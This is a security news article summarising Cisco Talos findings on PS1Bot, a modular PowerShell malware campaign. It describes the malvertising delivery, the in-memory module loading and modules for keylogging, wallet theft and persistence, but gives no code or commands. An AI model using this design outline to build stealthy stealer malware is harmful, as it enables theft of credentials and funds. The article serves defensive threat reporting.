PS1Bot Malware Campaign Unleashes Modular PowerShell Framework with Stealthy New Tricks

Cisco Talos has uncovered an ongoing and highly active malware campaign deploying a sophisticated, modular framework dubbed PS1Bot. Written in PowerShell and C#, this evolving threat is capable of information theft, keylogging, screen capturing, cryptocurrency wallet draining, and establishing long-term persistence on infected systems.

According to Talos, “PS1Bot features a modular design, with several modules delivered used to perform a variety of malicious activities on infected systems, including information theft, keylogging, reconnaissance and the establishment of persistent system access.” Since early 2025, fresh samples have been appearing frequently, underscoring the campaign’s rapid development cycle.

The infection chain begins with malvertising and SEO poisoning, luring victims into downloading malicious compressed archives with filenames tailored to trending search queries, such as chapter 8 medicare benefit policy manual.zip or zebra gx430t manual.zip.081. Inside, a JavaScript file named FULL DOCUMENT.js acts as a downloader, which “retrieves the next stage of the infection… employing a variety of obfuscation methods throughout 2025.”

Once executed, this loader fetches a PowerShell script from a command-and-control (C2) server. The script collects the system’s C: drive serial number to build a unique C2 URL and then enters a loop, continuously polling for and executing additional malicious modules entirely in memory.

Talos has documented multiple PS1Bot modules, each dedicated to specific malicious functions:

• Antivirus Detection – Identifies installed security software using WMI queries, then sends results to the C2 server.
• Screen Capture – Dynamically compiles C# code to capture and exfiltrate screenshots, often to monitor victim activity or steal on-screen data.
• Grabber Module – Targets “local browser storage… cryptocurrency wallet applications… and files containing passwords, sensitive strings or wallet seed phrases.” Talos observed large multilingual wordlists embedded to locate crypto recovery phrases.
• Keylogger – Uses SetWindowsHookEx() to record keystrokes and clipboard activity, sending logs back to the attacker.
• Information Collection – Performs WMI reconnaissance to determine domain membership, aiding in identifying high-value targets.
• Persistence – Creates hidden PowerShell scripts and malicious .LNK files to re-establish C2 connectivity after reboot.

Talos warns that “the modular nature of the implementation… enables the rapid deployment of updates or new functionality as needed.”

The investigation revealed “significant overlap in the C2 infrastructure” with prior malware campaigns involving Skitnet and Bossnet, as well as architectural similarities to AHK Bot. Notably, both PS1Bot and AHK Bot derive C2 URLs from the drive’s serial number and rely heavily on URL parameters for communication.

While modular malware is not new, PS1Bot’s combination of in-memory execution, broad data theft capabilities, and stealth-focused persistence makes it especially dangerous. By avoiding writing most payloads to disk, it can bypass antivirus detection, while its multi-vector data theft—targeting everything from MFA tokens to cryptocurrency wallets—poses high financial and privacy risks.

Related Posts:

• Google Products Exploited in Sophisticated Malvertising Scheme
• Microsoft Uncovers Massive Malvertising Campaign Distributing Info Stealers via GitHub
• Node.js Misused in Malvertising Campaigns to Deliver Stealthy Malware
• Google Ads Abused in Graphic Design Malvertising Attack